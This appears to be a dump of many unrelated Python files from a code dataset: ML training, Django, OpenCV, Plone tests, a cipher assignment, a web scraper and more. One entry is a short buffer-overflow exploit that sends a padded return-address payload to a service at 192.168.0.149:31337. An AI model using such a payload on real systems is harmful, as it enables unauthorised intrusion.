# hypothesis_outputs, premise_outputs[0], premise_lengths, output_size, scope=varscope)
#varscope.reuse_variables()
# Reading hypothesis with memory of premise and altered memory of hypothesis
hypothesis_outputs_processed, hypothesis_state = mutable_attention(
premise_outputs, hypothesis_outputs[0], hypothesis_lengths, output_size)
# todo: read premise and hypothesis memory for inferring entailment class
# fixme: last can be zero because of dynamic_rnn!
#output = hypothesis_outputs[0][:, -1, :]
output = hypothesis_state.h
#targets = tf.Print(targets, [tf.shape(targets)], "targets ")
#output = tf.Print(output, [tf.shape(output)], "outputs ")
logits, loss, predict = predictor(output, targets, options["answer_size"])
print('TRAINABLE VARIABLES (embeddings + model): %d' % get_total_trainable_variables())
print('ALL VARIABLES (embeddings + model): %d' % get_total_variables())
return logits, loss, predict
|
19,208 | e890b5c47280d123db369baf5a6ef61be8ee126b | N = int(input())
D = list(map(int, input().split()))
D.sort()
res = D[(N - 1) // 2 + 1] - D[(N - 1) // 2]
print(res)
|
19,209 | 5fe6de67131fee38b985b9d8930b788976ada85d | # Generated by Django 3.1.2 on 2020-11-13 00:27
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('payroll', '0005_auto_20201113_0026'),
]
operations = [
migrations.RemoveField(
model_name='contact',
name='name',
),
migrations.RemoveField(
model_name='employee',
name='name',
),
migrations.RemoveField(
model_name='employeeallowance',
name='name',
),
migrations.RemoveField(
model_name='employeededuction',
name='name',
),
migrations.RemoveField(
model_name='leavetype',
name='name',
),
migrations.RemoveField(
model_name='salary',
name='name',
),
]
|
19,210 | c1ff8487a905e411b64e5a62842f865b4fb40b1b | #!/usr/bin/python
import sys, socket
#080414C3
shellcode = "A" * 146 + "\xc3\x14\x04\x08"
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.149',31337))
s.send((shellcode + '\r\n'))
s.close()
#badchars= '\x00\x0a'
|
19,211 | 029d12ed3e3042e70fa8dfef83ce9b4ba716bc8f | import cv2
import numpy as np
num_d = 2
num_bi = 7
img_rgb = cv2.imread("2.jpg")
print(img_rgb.shape)
img_rgb = cv2.resize(img_rgb,(800,800))
img_color = img_rgb
for _ in range(num_d):
img_color = cv2.pyrDown(img_color)
img_color = img_rgb
for _ in range(num_d):
img_color = cv2.pyrDown(img_color)
for _ in range(num_d):
img_color = cv2.pyrUp(img_color)
img_gray = cv2.cvtColor(img_rgb, cv2.COLOR_RGB2GRAY)
img_blur = cv2.medianBlur(img_gray, 7)
img_edge = cv2.adaptiveThreshold(img_blur, 255, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, blockSize=9, C=2)
img_edge = cv2.cvtColor(img_edge, cv2.COLOR_GRAY2RGB)
img_cartoon = cv2.bitwise_and(img_color, img_edge)
cv2.imshow('img ', img_cartoon)
stack = np.hstack([img_rgb, img_cartoon])
#cv2.imshow('Stacked images', stack)
cv2.waitKey(0)
cv2.imwrite("cartoon.jpg", img_cartoon) |
19,212 | 782b08ad7eafeb686667cb4afc194a4759e8dfaa | from ftw.testing import MockTestCase
from opengever.task.browser.transitioncontroller import ITaskTransitionController
from opengever.task.browser.transitioncontroller import TaskTransitionController
from opengever.task.interfaces import ISuccessorTaskController
from Products.CMFPlone.interfaces import IPloneSiteRoot
from xml.dom.minidom import parse
from zope.app.component.hooks import setSite
from zope.component import getSiteManager
from zope.interface import alsoProvides
from zope.interface import Interface
from zope.interface.verify import verifyClass
import os.path
class TestTaskTransitionController(MockTestCase):
def setUp(self):
super(TestTaskTransitionController, self).setUp()
# we need to have a site root for making the cachecky work.
root = self.create_dummy(getSiteManager=getSiteManager,
id='root')
alsoProvides(root, IPloneSiteRoot)
setSite(root)
def test_verify_class(self):
self.assertTrue(
verifyClass(ITaskTransitionController,
TaskTransitionController))
def test_transitions_in_defintion_use_controller(self):
import opengever.task
path = os.path.join(
os.path.dirname(os.path.abspath(opengever.task.__file__)),
'profiles', 'default', 'workflows', 'opengever_task_workflow',
'definition.xml')
self.assertTrue(os.path.isfile(path))
doc = parse(path)
for node in doc.getElementsByTagName('transition'):
transition = node.getAttribute('transition_id')
self.assertEqual(node.getAttribute('title'), transition)
actions = node.getElementsByTagName('action')
self.assertEqual(len(actions), 1)
self.assertEqual(actions[0].firstChild.nodeValue, transition)
self.assertEqual(
actions[0].getAttribute('url'),
'%(content_url)s/@@task_transition_controller?transition=' +\
transition)
guard = node.getElementsByTagName('guard-expression')[0]
self.assertEqual(
guard.firstChild.nodeValue,
"python: here.restrictedTraverse('@@task_transition_" + \
"controller').is_transition_possible('%s')" % transition)
def test_is_administrator(self):
task1 = self.stub()
mock = self.stub()
self.mock_tool(mock, 'portal_membership')
self.expect(mock.getAuthenticatedMember()).result(mock)
with self.mocker.order():
self.expect(mock.has_role('Administrator')).result(0)
self.expect(mock.has_role('Manager')).result(0)
self.expect(mock.has_role('Administrator')).result(0)
self.expect(mock.has_role('Manager')).result(1)
self.expect(mock.has_role('Administrator')).result(1)
self.replay()
self.assertFalse(
TaskTransitionController(task1, {})._is_administrator())
self.assertTrue(
TaskTransitionController(task1, {})._is_administrator())
self.assertTrue(
TaskTransitionController(task1, {})._is_administrator())
def test_cancelled_to_open_actions(self):
transition = 'task-transition-cancelled-open'
controller, controller_mock, task = self._create_task_controller()
self.replay()
self.assertEqual(controller.get_transition_action(transition),
'http://nohost/plone/task-1/addresponse?' + \
'form.widgets.transition=%s' % transition)
def test_progress_to_resolved_actions(self):
transition = 'task-transition-in-progress-resolved'
controller, controller_mock, task = self._create_task_controller()
stc = self.stub()
self.mock_adapter(
stc, ISuccessorTaskController, [Interface])
with self.mocker.order():
# testcase 1: unival -> default form
self.expect(task.task_type_category).result(
'unidirectional_by_value')
# testcase 2: uniref -> default form
self.expect(task.task_type_category).result(
'unidirectional_by_reference')
# testcase 3: not responsible -> default form
self.expect(task.task_type_category).result(
'bidirectional_by_reference')
self.expect(
controller_mock._is_responsible_or_inbox_group_user()).result(
False)
# testcase 4: no predecessor -> default form
self.expect(task.task_type_category).result(
'bidirectional_by_reference')
self.expect(
controller_mock._is_responsible_or_inbox_group_user()).result(
True)
self.expect(task.predecessor).result(None)
# testcase 5: no predecessor -> default form
self.expect(task.task_type_category).result(
'bidirectional_by_reference')
self.expect(
controller_mock._is_responsible_or_inbox_group_user()).result(
True)
self.expect(task.predecessor).result('client2:213')
self.expect(stc(task).get_predecessor().task_type).result(
'forwarding_task_type')
# testcase 6: -> complete task wizard
self.expect(task.task_type_category).result(
'bidirectional_by_reference')
self.expect(
controller_mock._is_responsible_or_inbox_group_user()).result(
True)
self.expect(task.predecessor).result('client2:123')
self.expect(stc(task).get_predecessor().task_type).result(
'bidirectional_by_reference')
self.replay()
wizard_url = 'http://nohost/plone/task-1/' + \
'@@complete_successor_task?transition=%s' % transition
default_url = 'http://nohost/plone/task-1/addresponse?' + \
'form.widgets.transition=%s' % transition
# testcase 1: default form
self.assertEqual(controller.get_transition_action(transition),
default_url)
# testcase 2: default form
self.assertEqual(controller.get_transition_action(transition),
default_url)
# testcase 3: default form
self.assertEqual(controller.get_transition_action(transition),
default_url)
# testcase 4: default form
self.assertEqual(controller.get_transition_action(transition),
default_url)
# testcase 5: default form
self.assertEqual(controller.get_transition_action(transition),
default_url)
# testcase 6: complete task wizard
self.assertEqual(controller.get_transition_action(transition),
wizard_url)
def test_progress_to_closed_actions(self):
transition = 'task-transition-in-progress-tested-and-closed'
controller, controller_mock, task = self._create_task_controller()
stc = self.stub()
self.mock_adapter(
stc, ISuccessorTaskController, [Interface])
with self.mocker.order():
# testcase 1: unival -> default form
self.expect(task.task_type_category).result(
'bidirectional_by_value')
# testcase 2: uniref -> default form
self.expect(task.task_type_category).result(
'bidirectional_by_reference')
# testcase 3: not responsible -> default form
self.expect(task.task_type_category).result(
'unidirectional_by_reference')
self.expect(
controller_mock._is_responsible_or_inbox_group_user()).result(
False)
# testcase 4: no predecessor -> default form
self.expect(task.task_type_category).result(
'unidirectional_by_reference')
self.expect(
controller_mock._is_responsible_or_inbox_group_user()).result(
True)
self.expect(task.predecessor).result(None)
# testcase 5: no predecessor -> default form
self.expect(task.task_type_category).result(
'unidirectional_by_reference')
self.expect(
controller_mock._is_responsible_or_inbox_group_user()).result(
True)
self.expect(task.predecessor).result('client2:123')
self.expect(stc(task).get_predecessor().task_type).result(
'forwarding_task_type')
# testcase 6: -> complete task wizard
self.expect(task.task_type_category).result(
'unidirectional_by_reference')
self.expect(
controller_mock._is_responsible_or_inbox_group_user()).result(
True)
self.expect(task.predecessor).result('client2:123')
self.expect(stc(task).get_predecessor().task_type).result(
'unidirectional_by_reference')
self.replay()
wizard_url = 'http://nohost/plone/task-1/' + \
'@@complete_successor_task?transition=%s' % transition
default_url = 'http://nohost/plone/task-1/addresponse?' + \
'form.widgets.transition=%s' % transition
# testcase 1: default form
self.assertEqual(controller.get_transition_action(transition),
default_url)
# testcase 2: default form
self.assertEqual(controller.get_transition_action(transition),
default_url)
# testcase 3: default form
self.assertEqual(controller.get_transition_action(transition),
default_url)
# testcase 4: default form
self.assertEqual(controller.get_transition_action(transition),
default_url)
# testcase 5: default form
self.assertEqual(controller.get_transition_action(transition),
default_url)
# testcase 6: complete task wizard
self.assertEqual(controller.get_transition_action(transition),
wizard_url)
def test_open_to_cancel_actions(self):
transition = 'task-transition-open-cancelled'
controller, controller_mock, task = self._create_task_controller()
self.replay()
self.assertEqual(controller.get_transition_action(transition),
'http://nohost/plone/task-1/addresponse?' + \
'form.widgets.transition=%s' % transition)
def test_open_to_reject_actions(self):
transition = 'task-transition-open-rejected'
controller, controller_mock, task = self._create_task_controller()
self.replay()
self.assertEqual(controller.get_transition_action(transition),
'http://nohost/plone/task-1/addresponse?' + \
'form.widgets.transition=%s' % transition)
def test_open_to_resolved_actions(self):
transition = 'task-transition-open-resolved'
controller, controller_mock, task = self._create_task_controller()
successor_task_controller = self.stub()
self.mock_adapter(
successor_task_controller, ISuccessorTaskController, [Interface])
with self.mocker.order():
# testcase 1: unival -> default form
self.expect(task.task_type_category).result(
'unidirectional_by_value')
# testcase 2: uniref -> default form
self.expect(task.task_type_category).result(
'unidirectional_by_reference')
# testcase 3: not responsible -> default form
self.expect(task.task_type_category).result(
'bidirectional_by_reference')
self.expect(
controller_mock._is_responsible_or_inbox_group_user()).result(
False)
# testcase 4: no predecessor -> default form
self.expect(task.task_type_category).result(
'bidirectional_by_reference')
self.expect(
controller_mock._is_responsible_or_inbox_group_user()).result(
True)
self.expect(task.predecessor).result(None)
# testcase 5: no predecessor -> default form
self.expect(task.task_type_category).result(
'bidirectional_by_reference')
self.expect(
controller_mock._is_responsible_or_inbox_group_user()).result(
True)
self.expect(task.predecessor).result('client2:123')
self.expect(
successor_task_controller(task).get_predecessor().task_type
).result('forwarding_task_type')
# testcase 6: -> complete task wizard
self.expect(task.task_type_category).result(
'bidirectional_by_reference')
self.expect(
controller_mock._is_responsible_or_inbox_group_user()).result(
True)
self.expect(task.predecessor).result('client2:123')
self.expect(
successor_task_controller(task).get_predecessor().task_type
).result('bidirectional_by_reference')
self.replay()
wizard_url = 'http://nohost/plone/task-1/' + \
'@@complete_successor_task?transition=%s' % transition
default_url = 'http://nohost/plone/task-1/addresponse?' + \
'form.widgets.transition=%s' % transition
# testcase 1: default form
self.assertEqual(controller.get_transition_action(transition),
default_url)
# testcase 2: default form
self.assertEqual(controller.get_transition_action(transition),
default_url)
# testcase 3: default form
self.assertEqual(controller.get_transition_action(transition),
default_url)
# testcase 4: default form
self.assertEqual(controller.get_transition_action(transition),
default_url)
# testcase 5: predecessor is a forwarding
self.assertEqual(controller.get_transition_action(transition),
default_url)
# testcase 6: complete task wizard
self.assertEqual(controller.get_transition_action(transition),
wizard_url)
def test_reassign_actions(self):
transition = 'task-transition-reassign'
controller, controller_mock, task = self._create_task_controller()
self.replay()
self.assertEqual(controller.get_transition_action(transition),
'http://nohost/plone/task-1/@@assign-task?' + \
'form.widgets.transition=%s' % transition)
def test_rejected_to_open_actions(self):
transition = 'task-transition-rejected-open'
controller, controller_mock, task = self._create_task_controller()
self.replay()
self.assertEqual(controller.get_transition_action(transition),
'http://nohost/plone/task-1/addresponse?' + \
'form.widgets.transition=%s' % transition)
def test_resolved_to_closed_actions(self):
transition = 'task-transition-resolved-tested-and-closed'
controller, controller_mock, task = self._create_task_controller()
self.replay()
self.assertEqual(controller.get_transition_action(transition),
'http://nohost/plone/task-1/addresponse?' + \
'form.widgets.transition=%s' % transition)
def test_resolved_to_progress_actions(self):
transition = 'task-transition-resolved-in-progress'
controller, controller_mock, task = self._create_task_controller()
self.replay()
self.assertEqual(controller.get_transition_action(transition),
'http://nohost/plone/task-1/addresponse?' + \
'form.widgets.transition=%s' % transition)
def _create_task_controller(self):
task1 = self.mocker.mock()
self.expect(task1.absolute_url()).result(
'http://nohost/plone/task-1').count(0, None)
self.expect(task1.getPhysicalPath()).result(
['', 'plone', 'task-1']).count(0, None)
controller = TaskTransitionController(task1, {})
controller_mock = self.mocker.patch(controller)
self.expect(controller_mock._is_administrator()).result(False).count(0, None)
return controller, controller_mock, task1
|
19,213 | ef048167dfd8398519beb3868826c7011728d49c | #! /usr/bin/env python
__all__ = ['base_crawler', 'horriblesubs_crawler']
|
19,214 | 3ffe78a91dda514cf17451b312606fab99dfdd6c | '''
Дана послідовність цілих чисел а1, ... a30. Нехай М - найбільше з цих чисел, а m -
найменше. Вивести на екран у порядку зростання всі цілі з інтервалу (m, M), які не
входять до послідовність а1, ... а30.
'''
from random import randint
while True:
a = [randint(1,50) for i in range(31)]
M = max(a)
m = min(a)
z = []
for i in range(m,M+1):
z.append(i)
for j in range(len(z)):
if z[j] in a:
z.remove(z[j])
print(z)
key = input('Again? Yes - 1, no - 2: ')
if key == '1':
continue
else:
print('Bye')
break |
19,215 | c58d0fae2a79baeeccac356fa3b213ff38587284 | from pythongame.core.common import ItemType, Sprite, UiIconSprite, HeroStat, StatModifierInterval
from pythongame.core.item_inventory import ItemEquipmentCategory
from pythongame.game_data.items.register_items_util import register_randomized_stat_modifying_item
def register_leather_armor_item():
register_randomized_stat_modifying_item(
item_type=ItemType.LEATHER_ARMOR,
item_level=1,
ui_icon_sprite=UiIconSprite.ITEM_LEATHER_ARMOR,
sprite=Sprite.ITEM_LEATHER_ARMOR,
image_file_path="resources/graphics/item_leather_armor.png",
item_equipment_category=ItemEquipmentCategory.CHEST,
name="Leather armor",
stat_modifier_intervals=[StatModifierInterval(HeroStat.ARMOR, [1])]
)
|
19,216 | 812d135d612404753b19d388b9c3b7c42c05337d | #from django.http import HttpResponse
from django.shortcuts import render
def home(request):
return render(request,'home.html')
def count(request):
total_count=(len(request.GET['text']))
user_text=request.GET['text']
type(user_text)
word_count={}
for word in user_text:
if word not in word_count:
word_count[word]=1
else:
word_count[word]+=1
sorted_dict=sorted(word_count.items(),key=lambda m:m[1],reverse=True)
return render(request,'count.html',
{'count':total_count,'user_text':user_text,
'wordcount':word_count,'sorteddict':sorted_dict})
def about(request):
return render(request,'about.html') |
19,217 | a2fb05e13d0292ce045092e2c6b6414c4f011b54 | from typing import Protocol
def sms_decorator(func, to):
from ..models import SMSMessage
def wrapper():
result = func()
if result:
SMSMessage.objects.create(phone_number=to)
return wrapper
class SMSProviderClass(Protocol):
to: str
message: str
conf: dict
def send_sms(self) -> None:
pass
class SMSProvider:
def __getattribute__(self, item):
element = super().__getattribute__(item)
if callable(element) and item == "send_sms":
return sms_decorator(element, self.to)
return element
def __init__(self, to, message, conf):
self.to = to
self.message = message
self.conf = conf
def send_sms(self) -> str:
raise NotImplementedError()
|
19,218 | 1761783aa65dbc12111b59ea25b9cb7ad8cc9a20 | from cursesmenu import *
from cursesmenu.items import *
import sys
import os
# '1': Example
# '2': Matrix A
# '3': Rest
# '4': Show Config
if sys.platform == 'darwin':
python = 'python2.7'
else:
python = 'python'
# Create the menu
menu = CursesMenu("Declarative Task - Day One", 'Subject: ' + sys.argv[1])
dayOneExample = CommandItem(text='Example',
command=python + " src" + os.path.sep + "ld_example.py",
arguments='Example, ' + sys.argv[1],
menu=menu,
should_exit=False)
soundVolumeAdjustment = CommandItem(text='sound Volume Adjustment',
command=python + " src" + os.path.sep + "ld_calibrateSoundVolumeSubprocess.py",
arguments=sys.argv[1],
menu=menu,
should_exit=False)
dayOnePreLearning = CommandItem(text="PreLearning",
command=python + " src" + os.path.sep + "ld_declarativeTask.py ",
arguments="DayOne-PreLearning, " + sys.argv[1],
menu=menu,
should_exit=False)
dayOneLearning = CommandItem(text="Matrix A",
command=python + " src" + os.path.sep + "ld_declarativeTask_relauncher.py ",
arguments="DayOne-Learning, " + sys.argv[1],
menu=menu,
should_exit=False)
dayOneTestMatrixA = CommandItem(text="Test Matrix A",
command=python + " src" + os.path.sep + "ld_declarativeTask.py ",
arguments="Day One - Test Learning, " + sys.argv[1],
menu=menu,
should_exit=False)
dayOneConsolidationMatrixA = CommandItem(text="Consolidation Matrix A",
command=python + " src" + os.path.sep + "ld_declarativeTask.py ",
arguments="Day One - Test Consolidation, " + sys.argv[1],
menu=menu,
should_exit=False)
dayOneRecognition = CommandItem(text="Recognition",
command=python + " src" + os.path.sep + "ld_recognition.py ",
arguments="Day One - Recognition, " + sys.argv[1],
menu=menu,
should_exit=False)
dayOneConfig = CommandItem(text='Show config file',
command=python + " src" + os.path.sep + "ld_showConfigFile.py",
menu=menu,
should_exit=False)
menu.append_item(dayOneExample)
menu.append_item(dayOnePreLearning)
menu.append_item(soundVolumeAdjustment)
menu.append_item(dayOneLearning)
menu.append_item(dayOneTestMatrixA)
menu.append_item(dayOneConsolidationMatrixA)
menu.append_item(dayOneRecognition)
menu.append_item(dayOneConfig)
menu.show()
|
19,219 | 000f1bd532b51e33d623242f5256e7d3e85397d6 | """
Assignment 1: Cryptography
Course: CS 92SI
Name: <YOUR NAME>
Date: <DATE>
Replace this with a description of the program.
"""
plain_to_cipher = {}
for old_char_val in range(ord('a'), ord('z') + 1):
new_char_val = old_char_val + 3
if (new_char_val > ord('z')):
new_char_val -= 26
plain_to_cipher[chr(old_char_val)] = chr(new_char_val)
for old_char_val in range(ord('A'), ord('Z') + 1):
new_char_val = old_char_val + 3
if (new_char_val > ord('Z')):
new_char_val -= 26
plain_to_cipher[chr(old_char_val)] = chr(new_char_val)
cipher_to_plain = {}
for old_char_val in range(ord('a'), ord('z') + 1):
new_char_val = old_char_val - 3
if (new_char_val < ord('a')):
new_char_val += 26
cipher_to_plain[chr(old_char_val)] = chr(new_char_val)
for old_char_val in range(ord('A'), ord('Z') + 1):
new_char_val = old_char_val - 3
if (new_char_val < ord('A')):
new_char_val += 26
cipher_to_plain[chr(old_char_val)] = chr(new_char_val)
def encrypt_caesar(plaintext):
"""
Encrypts plaintext using a Caesar cipher.
Add more implementation details here.
"""
return ''.join([plain_to_cipher[old] for old in plaintext.upper()])
def decrypt_caesar(ciphertext):
"""
Decrypts a ciphertext using a Caesar cipher.
Add more implementation details here.
"""
return ''.join([cipher_to_plain[old] for old in ciphertext.upper()])
def caesar_transform(operation, str):
"""
Transform a string using caesar cypher. operation is either 'E'(encrypt) or 'D'(decrypt).
return transformed str
"""
if operation == 'E':
return encrypt_caesar(str)
else:
return decrypt_caesar(str)
def encrypt_vigenere(plaintext, keyword):
"""
Encrypts plaintext using a Vigenere cipher with a keyword.
Return encrypted str
"""
list = []
index = 0
for char in plaintext:
new_char_val = ord(char) + ord(keyword[index]) - ord('A')
if new_char_val > ord('Z'):
new_char_val -= 26
list.append(chr(new_char_val))
index += 1
index %= len(keyword)
return ''.join(list)
def decrypt_vigenere(ciphertext, keyword):
"""
Decrypts ciphertext using a Vigenere cipher with a keyword.
Return decrypted str
"""
list = []
index = 0
for char in ciphertext:
new_char_val = ord(char) - (ord(keyword[index]) - ord('A'))
if new_char_val < ord('A'):
new_char_val += 26
list.append(chr(new_char_val))
index += 1
index %= len(keyword)
return ''.join(list)
def vigenere_transform(operation, str):
"""
Transform a string using vigenere cypher. operation is either 'E'(encrypt) or 'D'(decrypt).
return transformed str
"""
key = input("Passkey? ").upper()
if operation == 'E':
print("Encrypting {0} using Vigenere cipher with key {1}".format(str, key))
print("...")
return encrypt_vigenere(str, key)
else:
print("Decrypting {0} using Vigenere cipher with key {1}".format(str, key))
print("...")
return decrypt_vigenere(str, key)
def encrypt_railfence(plaintext, num_rails):
"""
Encrypts plaintext using a railfence cipher.
Return encrypted str
"""
if num_rails == 1:
return plaintext
lists = []
for i in range(0, num_rails):
lists.append([])
row = -1
dir = 1
for char in plaintext:
row += dir
lists[row].append(char)
if row == 0:
dir = 1
elif row == num_rails - 1:
dir = -1
encrypted = ""
for list in lists:
#print(list)
encrypted += ''.join(list)
return encrypted
def slice_ciphertext(ciphertext, num_rails):
"""
slice ciphertext into num_rails lists
"""
cycle = num_rails + num_rails - 2
lists = [[] for i in range(num_rails)]
cipher_len = len(ciphertext)
start = 0
for row in range(num_rails):
if row == 0 or row == num_rails - 1:
row_len = cipher_len // cycle
if cipher_len % cycle > row:
row_len += 1
lists[row] = ciphertext[start:start+row_len]
start += row_len
else:
row_len = cipher_len // cycle * 2
if cipher_len % cycle > row:
row_len += 1
lists[row] = ciphertext[start:start+row_len]
start += row_len
return lists
def decrypt_railfence(ciphertext, num_rails):
"""
Decrypts ciphertext using a railfence cipher.
Return decrypted str
"""
if num_rails == 1:
return ciphertext
lists = slice_ciphertext(ciphertext, num_rails) # could use queue to simply the implementation once we got to OOP
#print(lists)
rows_indices = [0] * num_rails
decrypted = ''
row = -1
dir = 1
cipher_len = len(ciphertext)
for i in range(cipher_len):
row += dir
decrypted += lists[row][rows_indices[row]]
rows_indices[row] += 1
if row == 0:
dir = 1
elif row == num_rails - 1:
dir = -1
return decrypted
def railfence_transform(operation, str):
"""
Transform a string using railfence cypher. operation is either 'E'(encrypt) or 'D'(decrypt).
return transformed str
"""
num_rails = int(input("Rails: "))
if operation == 'E':
print("Encrypting {0} using Railfence cipher with num_rails {1}".format(str, num_rails))
print("...")
return encrypt_railfence(str, num_rails)
else:
print("Decrypting {0} using Railfence cipher with num_rails {1}".format(str, num_rails))
print("...")
return decrypt_railfence(str, num_rails)
def read_from_file(filename):
"""
Reads and returns content from a file.
Read file line by line and concatenate them
"""
with open(filename, 'r') as f:
lines = [line for line in f]
return "".join(lines)
def write_to_file(filename, content):
"""
Writes content to a file.
Add more implementation details here.
"""
with open(filename, 'w') as f:
f.write(content)
def get_input():
"""
get input string from console input or file.
return string is capitalized
"""
choice = input("(F)ile or (S)tring? ").upper()
while not choice or choice[0] not in ['F', 'S']:
choice = input("Please enter either 'F' or 'S'. Again (F/S)? ").upper()
if choice[0] == 'S':
input_str = input("Enter the string to encrypt/decrypt: ")
else:
filename = input("Filename: ")
input_str = read_from_file(filename)
return input_str.upper()
def strip(str):
"""
Strip a given string by removing all non-alphabetic chars
"""
return ''.join([char for char in str if char.isalpha()])
def transform(str):
"""
transform(encrypt/decrypt) a given string based on user input
"""
operation = input("(E)ncrypt or (D)ecrypt? ").upper()
while not operation or operation not in ['E', 'D']:
operation = input("Please enter either 'E' or 'D'. Again (E/D)? ").upper()
cipher = input("(C)aesar, (V)igenere, or (R)ailfence? ").upper()
while not cipher or cipher not in ['C', 'V', 'R']:
cipher = input("Please enter either 'C', 'V' or 'R'. Again (C/V/R)? ").upper()
if cipher == 'C':
return operation, caesar_transform(operation, str)
elif cipher == 'V':
return operation, vigenere_transform(operation, str)
elif cipher == 'R':
return operation, railfence_transform(operation, str)
def output(operation, transformed):
output_option = input("(F)ile or (S)tring ").upper()
while not output_option or output_option not in ['F', 'S']:
output_option = input("Please enter either 'F' or 'S'. Again (F/S)? ").upper()
if (output_option == 'S'):
if (operation == 'E'):
print("The ciphertext is: {0}".format(transformed))
else:
print("The plaintext is: {0}".format(transformed))
else:
output_file = input("Filename? ")
if (operation == 'E'):
print("Writing ciphertext to {0}...".format(output_file))
else:
print("Writing plaintext to {0}...".format(output_file))
write_to_file(output_file, transformed)
def run_suite():
"""
Runs a single iteration of the cryptography suite.
Asks the user for input text from a string or file, whether to encrypt
or decrypt, what tool to use, and where to show the output.
"""
print("*Input*")
input_str = get_input()
stripped = strip(input_str)
print("*Transform*")
operation, transformed = transform(stripped)
print("*Output*")
output(operation, transformed)
# Do not modify code beneath this point.
def should_continue():
"""
Asks the user whether they would like to continue.
Responses that begin with a `Y` return True. (case-insensitively)
Responses that begin with a `N` return False. (case-insensitively)
All other responses (including '') cause a reprompt.
"""
choice = input("Again (Y/N)? ").upper()
while not choice or choice[0] not in ['Y', 'N']:
choice = input("Please enter either 'Y' or 'N'. Again (Y/N)? ").upper()
return choice[0] == 'Y'
def main():
"""Harness for the Cryptography Suite"""
print("Welcome to the Cryptography Suite!")
run_suite()
while should_continue():
run_suite()
print("Goodbye!")
if __name__ == '__main__':
"""This block is run if and only if the Python script is invoked from the
command line."""
main()
|
19,220 | 8791ccff50dff6953b68bc7b5fb35d18c3f1b885 | def handleCommand():
return 'Authors:Arvid Granroth & Benjamin Tellström \n' + 'Github Repo:https://github.com/Arrezz/SkivirBotPy'
|
19,221 | c3cfbec282736026e41ac33a53e2dafde2df4f53 | import dash
external_stylesheets = [
'https://codepen.io/chriddyp/pen/bWLwgP.css',
'https://cdn.rawgit.com/plotly/dash-app-stylesheets/0e463810ed36927caf20372b6411690692f94819/dash-drug-discovery-demo-stylesheet.css'
]
app = dash.Dash(__name__, external_stylesheets=external_stylesheets)
server = app.server
app.config.suppress_callback_exceptions = True
app.server.config.from_mapping(QCPORTAL_URI=None)
|
19,222 | 583f8cc59475d49ab903c601969e142073cea479 | from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker
from sqlalchemy.pool import StaticPool
# The global database session.
session = None
def init_session(connection_string=None, drop=False):
"""Initialize the database session and create the schema if it
does not exist.
The connection string describes the database connection.
Documentation on this can be found on [1]. If its omitted
a temporary in-memory sqlite database will be used. This
is useful for unittesting where you need a fresh database
on every run.
The schema can also be dropped before initialization by
setting the drop parameter to true.
The session can be accessed by the session variable of the
database module.
[1] http://docs.sqlalchemy.org/en/rel_0_8/core/engines.html
:param connection_string: The connection description for the
engine. See above for details
:param drop: Drop the schema and recreate it in init. All
data will be lost!
"""
if connection_string is None:
engine = create_engine('sqlite://',
echo=False,
connect_args={'check_same_thread':False},
poolclass=StaticPool)
else:
engine = create_engine(connection_string)
from database.model import Base
global session
if drop:
try:
old_session = session
Base.metadata.drop_all(bind=old_session.bind)
except:
pass
db_session = scoped_session(sessionmaker(autocommit=False,
autoflush=False,
bind=engine))
Base.metadata.create_all(bind=engine)
session = db_session
|
19,223 | 349f042f3209106501fc2d7186b96d5df0da41bd | import keras
import json
import numpy as np
import util.emnist as emnist
import util.data as data_util
import util.model as model_util
import results.results as results_util
"""
We pretend sorted model is doing it in tasks so we can compare it
to the models who are using tasks
"""
model_ids = [0, 1, 2]
task_counts_to_compare_to = [5, 10, 25]
epochs = 3
batch_size = 128
balanced_set = emnist.sets['balanced']
validation_split = 0.2
#Could probably do some stuff with model.metric_names if needs be
#https://stackoverflow.com/questions/51299836/what-values-are-returned-from-model-evaluate-in-keras
loss_index = 0
categorial_accuracy_index = 1
top_2_accuracy_index = 2
filepath = './models/untrained'
#For every model set up
for task_count in task_counts_to_compare_to:
for model_id in model_ids:
results = []
samples_seen = 0
#Load in our modelPretend
model_to_load = 'model_{0}'.format(model_id)
model = model_util.load(model_to_load, filepath)
#To prevent any possible corruption between cycles, just reload and
#reprocess the data, including resorting
data, classes = emnist.get(balanced_set)
x, y, val_x, val_y = data_util.validation_split(data['x'], data['y'], validation_split)
x, y = emnist.mean_sort(x, y, classes, task_count)
#Convert data to be used in model
x, y = data_util.prep(x, y, classes)
val_x, val_y = data_util.prep(val_x, val_y, classes)
test_x, test_y = data_util.prep(data['test_x'], data['test_y'], classes)
#Create Tasks for comparison sake, just going through unsorted data in chunks
tasks_x = data_util.chunk(x, task_count)
tasks_y = data_util.chunk(y, task_count)
#Train our current model through all the tasks for every epoch
for epoch in range(0, epochs):
for task_index in range(0, task_count):
#Train our model on the task
model.fit(
x=tasks_x[task_index],
y=tasks_y[task_index],
batch_size=batch_size,
epochs=1,
validation_data=(val_x, val_y)
)
#Evaluate our model
score = model.evaluate(
x=test_x,
y=test_y,
batch_size=128
)
samples_seen += len(tasks_x[task_index])
result_point = {
"samples_seens" : samples_seen,
"categorial_accuracy" : score[categorial_accuracy_index],
"top_2_accuracy" : score[top_2_accuracy_index],
"loss" : score[loss_index],
"epoch" : epoch,
"task" : task_index,
}
results.append(result_point)
#We have finished training this model, save the results
name = "id{0}_t{1}_sorted".format(model_id, task_count)
model_results = {
"name" : name,
"id" : model_id,
"task_count" : task_count,
"results" : results
}
results_util.save('./results/data', name, model_results)
|
19,224 | 3685b3aa3f6a8c0d2278a728c8dd4c35b095da3b | from scrapy_splash import SplashRequest
from scrapy import Spider
from .. import selector_paths
from ..items import Boardgame
BASE_URI = "https://boardgamegeek.com"
LIST_URL = BASE_URI + "/browse/boardgame"
CREDITS_URI = '/credits'
class BGGSpider(Spider):
name = 'bgg_spider'
allowed_domains = ['boardgamegeek.com']
start_urls = [
LIST_URL
]
def parse(self, response):
for row_ in response.xpath('.//tr[@id="row_"]'):
bg = Boardgame()
bg['title'] = row_.xpath(
selector_paths.SEL_TITLE).extract_first()
bg['geek_rating'], bg['avg_rating'], bg['votes'] = [x for x in row_.xpath(selector_paths.SEL_METRICS).extract()]
if 'N/A' in bg['geek_rating'] and 'N/A' in bg['avg_rating']:
print('INFO: Not enough information dropping BG.')
yield
bg_link = BASE_URI + row_.xpath(
selector_paths.SEL_LINK).extract_first()
bg['bg_id'] = bg_link.split('/')[4]
yield SplashRequest(
url=bg_link,
